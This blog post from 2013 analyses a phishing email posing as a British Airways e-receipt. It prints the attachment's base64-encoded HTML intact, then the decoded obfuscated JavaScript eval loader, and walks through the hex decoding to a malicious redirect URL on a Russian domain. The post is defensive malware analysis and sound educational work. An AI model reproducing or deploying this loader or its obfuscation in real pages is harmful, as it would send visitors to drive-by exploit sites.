Wednesday, March 27, 2013

More HTML Virus Decoding

"HTML" based viruses give us a rare view into the workings of a virus or at least some of the mechanics of how it is launched.

So we have a new twist on the fake e-ticket scam.

I received a fake British Airways e-reciept with an attachment labeled as htm.

I viewed the email source and it was base-64 encoded:

PGh0bWw+DQogPGhlYWQ+DQogIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVu
dD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Ij4NCjx0aXRsZT5QbGVhc2Ugd2FpdDwvdGl0bGU+
DQogPC9oZWFkPg0KIDxib2R5PiAgDQo8aDE+PGI+IFlvdSB3aWxsIGJlIGZvcndhcmRlZC4uLiBX
YWl0IHBsZWFzZS4uLjwvaDE+PC9iPg0KPGg0PkludGVybmV0IEV4cGxvcmVyIGNvbXBhdGlibGUg
b25seSEgPC9oND48YnI+DQoNCjxzY3JpcHQ+cD1wYXJzZUludDtzcz0oMSk/U3RyaW5nLmZyb21D
aGFyQ29kZTowO2FzZ3E9Ijc2ITYxITcyITMxITNkITM0ITNAITNiIWEhNzYhNjEhNzIhMzIhM2Qh
NzYhNjEhNzIhMzEhM2IhYSE2QCE2NiEyOCE3NiE2MSE3MiEzMSEzZCEzZCE3NiE2MSE3MiEzMiEy
QCEyMCE3YiE2NCE2ZiE2MyE3NSE2ZCE2NSE2ZSE3NCEyZSE2YyE2ZiE2MyE2MSE3NCE2QCE2ZiE2
ZSEzZCEyMiE2OCE3NCE3NCE3MCEzYSEyZiEyZiE2QCE2YyE2YyE3NSE2ZCE2QCE2ZSE2MSE3NCE2
MSE2NiEyZSE3MiE3NSEzYSEzOCEzMCEzOCEzMCEyZiE2NiE2ZiE3MiE3NSE2ZCEyZiE2YyE2QCE2
ZSE2YiE3MyEyZiE2MyE2ZiE2YyE3NSE2ZCE2ZSEyZSE3MCE2OCE3MCEyMiEzYiE3ZCIucmVwbGFj
ZSgvQC9nLCI5Iikuc3BsaXQoIiEiKTt0cnl7ZG9jdW1lbnQuYm9keSY9MC4xfWNhdGNoKGdkc2dz
ZGcpe3p6PTM7ZGJzaHJlPTIzO2lmKGRic2hyZSl7dmZ2d2U9MDt0cnl7ZG9jdW1lbnQ7fWNhdGNo
KGFnZHNnKXt2ZnZ3ZT0xO31pZighdmZ2d2Upe2U9d2luZG93WyJlIi5jb25jYXQoInYiKyJhbCIp
XTt9DQpzPSIiO2lmKHp6KWZvcihpPTA7aS0xMDchPTA7aSsrKXtpZih3aW5kb3cuZG9jdW1lbnQp
cys9c3MocChhc2dxW2ldLDE2KSk7fQ0KaWYod2luZG93LmRvY3VtZW50KWUocyk7fX08L3Njcmlw
dD4NCg0KPC9ib2R5Pg0KPC9odG1sPg==

After decoding that using:
http://www.opinionatedgeek.com/dotnet/tools/base64decode/

I found a script that redirected the browser to a site that is encoded in a way that we were seeing a couple of years ago.

It's trying to take advantage of an Internet Explorer vulnerability and they even have the chutzpah to say "IE only"


(I added the spaces in the tags to break them)
 

< h t m l >
 

 
Please wait
 

You will be forwarded... Wait please...


Redirecting...

Internet Explorer compatible only!


p=parseInt;ss=(1)?String.fromCharCode:0;asgq="76!61!72!31!3d!34!3@!3b!a!76!61!72!32!3d!76!61!72!31!3b!a!6@!66!28!76!61!72!31!3d!3d!76!61!72!32!2@!20
!7b!64!6f!63!75!6d!65!6e!74!2e!6c!6f!63!61!74!6@!6f!6e!3d!22!68!74!74!70!3a!2f!2f!6@!6c!6c!75!6d!6@!6e!61!74!61
!66!2e!72!75!3a!38!30!38!30!2f!66!6f!72!75!6d!2f!6c!6@!6e!6b!73!2f!63!6f!6c!75!6d!6e!2e!70!68!70!22!3b!7d".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=23;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("v"+"al")];}
s="";if(zz)for(i=0;i-107!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}
if(window.document)e(s);}}


< / broken html >


------------------------------------------------------------------------------

The part that is all hex characters:

76!61!72!31!3d!34!3@!3b!a!76!61!72!32!3d!76!61!72!31!3b!a!6@!66!28!76!61!72!31!3d!3d!76!61!72!32!2@!20
!7b!64!6f!63!75!6d!65!6e!74!2e!6c!6f!63!61!74!6@!6f!6e!3d!22!68!74!74!70!3a!2f!2f!6@!6c!6c!75!6d!6@!6e!61!
74!61!66!2e!72!75!3a!38!30!38!30!2f!66!6f!72!75!6d!2f!6c!6@!6e!6b!73!2f!63!6f!6c!75!6d!6e!2e!70!68!70!22!3b!7d

You can decode with any ASCII chart (http://www.asciitable.com/)

All the characters are in hex except for:
All chars in hex except
2@=29h=)
3@=39h=9
6@=69h=i

The script uses ! as a separator so ignore them.

And...

This all translates to (I broke the http)
var1=49 ; \n
var2=var1; \n
if(var1==var2  ) [space] {
document.location="h t t p://illuminataf.ru:8080/forum/link/column.php;}

which is likely a viral php script on a site in Russian that has likely been broken into.